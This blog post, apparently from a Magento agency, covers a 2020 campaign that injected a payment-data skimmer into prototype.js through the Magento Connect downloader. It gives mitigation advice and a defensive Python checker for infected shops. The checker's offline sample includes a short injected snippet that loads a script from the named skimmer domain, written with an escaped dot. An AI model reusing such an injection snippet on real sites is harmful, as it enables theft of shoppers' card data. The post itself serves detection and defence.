Magento – More than 2000 Shops worldwide hacked in a weekend

The coronavirus is not the only thing making headlines at the moment. Since last weekend, news of around 2000 hacked Magento shops has been circulating and is causing considerable unrest in the Magento community. At first no details were known about how it happened and what was affected, but more became known every hour. The purpose of the attack was to intercept customers' payment data: the injected script records the data entered in the checkout (a keylogger) and transmits it to a third party.
It has since been published that the attack exploits a security vulnerability in Magento Connect, or more precisely in the Magento downloader. This is used to write malicious code into prototype.js that loads a widget from an external server, m c d n n .net (written with spaces here so that it is not a link).
More information can be found here.

We have written a very simple script that checks your online shop for this malicious code. All you have to do is enter the complete URL of the shop and click on “Check”. The script then checks whether the (publicly accessible) prototype.js contains a reference to the external domain mentioned above.

The script can also check several URLs at once: simply enter one URL per line and have them checked.

What helps against this security gap? The simplest answer: Magento 2. Alternatively, in this specific case (as far as is currently known), deactivating the Magento Connect function also helps; the simplest option is to delete or rename the “downloader” folder in the root directory of the shop. Afterwards, check that the shop URL followed by /downloader/ no longer returns the Magento Connect Manager page. In our customer projects this function is deactivated by default, in order to rule out such security gaps in Magento Connect in general.
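The following is an added example that implements the check described above in Python; it is not the script offered by the post. It looks for a reference to the external domain in prototype.js (one or more shop URLs, one per line) and additionally reports whether the Magento Connect downloader is still publicly reachable. The paths /js/prototype/prototype.js and /downloader/, the treatment of simple \xHH and \uHHHH escaping, and the sample responses used for the offline run are assumptions of this example and are not stated on the page.

```python
#!/usr/bin/env python3
"""Check Magento 1 shops for the prototype.js injection and an exposed downloader.

Added example, not the tool from the original post. Assumptions (not stated on
the page): prototype.js is served at <shop>/js/prototype/prototype.js (the
standard Magento 1 location); Magento Connect answers at <shop>/downloader/ while
it is enabled; the injected code names the domain in clear text or with simple
\\xHH / \\uHHHH escaping. Other obfuscation is not detected.
"""
import re
import sys
import urllib.error
import urllib.request

MALICIOUS_DOMAIN = "mcdnn.net"                  # domain named in the post, written out here on purpose
PROTOTYPE_PATH = "/js/prototype/prototype.js"   # assumption: standard Magento 1 path
DOWNLOADER_PATH = "/downloader/"                # assumption: Magento Connect entry point

_JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def unescape_js(text):
    """Resolve \\xHH and \\uHHHH escapes so that 'mcdnn\\x2enet' reads as 'mcdnn.net'."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def references_malicious_domain(js_source):
    """True if the JavaScript mentions the domain, also when its dot is escaped."""
    return MALICIOUS_DOMAIN in unescape_js(js_source).lower()


def fetch(url, timeout=10):
    """GET a URL and return (status, body); HTTP and network errors never raise."""
    req = urllib.request.Request(url, headers={"User-Agent": "magento-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def check_shop(base_url, fetcher=fetch):
    """Check one shop; `fetcher` is injectable so the logic can be exercised offline."""
    base = base_url.rstrip("/")
    status, body = fetcher(base + PROTOTYPE_PATH)
    downloader_status, _ = fetcher(base + DOWNLOADER_PATH)
    return {
        "url": base,
        "prototype_status": status,
        "infected": status == 200 and references_malicious_domain(body),
        # 200 means the Connect Manager still answers; 403/404 means it is gone or blocked
        "downloader_reachable": downloader_status == 200,
    }


def check_many(lines, fetcher=fetch):
    """One URL per line, blank lines ignored (the multi-URL mode of the post's tool)."""
    return [check_shop(line.strip(), fetcher) for line in lines if line.strip()]


# Constructed sample responses (not real shop data) for an offline demonstration.
SAMPLE_CLEAN = "var Prototype = { Version: '1.7' };"
SAMPLE_INFECTED = SAMPLE_CLEAN + (
    "\n(function(){var s=document.createElement('script');"
    "s.src='https://mcdnn\\x2enet/w.js';document.head.appendChild(s)})();"
)
FAKE_RESPONSES = {
    "https://shop.example/js/prototype/prototype.js": (200, SAMPLE_INFECTED),
    "https://shop.example/downloader/": (200, "<html>Magento Connect Manager</html>"),
    "https://clean.example/js/prototype/prototype.js": (200, SAMPLE_CLEAN),
    "https://clean.example/downloader/": (404, ""),
}


def fake_fetch(url, timeout=10):
    """Offline stand-in for fetch() that serves the constructed responses above."""
    return FAKE_RESPONSES.get(url, (None, ""))


def main(argv):
    """Usage: check.py URL [URL ...]  or  check.py < urls.txt (one URL per line)."""
    lines = argv[1:] or sys.stdin.readlines()
    for r in check_many(lines):
        if r["prototype_status"] != 200:
            state = "prototype.js not reachable"
        else:
            state = "INFECTED" if r["infected"] else "clean"
        dl = "downloader exposed" if r["downloader_reachable"] else "downloader not reachable"
        print(f"{r['url']}: {state}; {dl}")


if __name__ == "__main__":
    main(sys.argv)
```

A clean result only means that this particular domain was not found; a skimmer that has been moved to another host or obfuscated differently is not caught, so an inspection of the file itself and of the server's modification times remains necessary.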

The script for the check (without any warranty!) is available HERE.

If there is more news, we will update the article.

For questions or support – just contact us.

Published by Covos

Since 2009 I have been working intensively with Magento. I started with the creation and operation of B2C shops. This was extended through my work in the logistics sector, which first resulted in specialised B2E systems. Today I work day by day on exciting B2C, B2B and B2E projects and report in this blog about challenges and give insider tips.
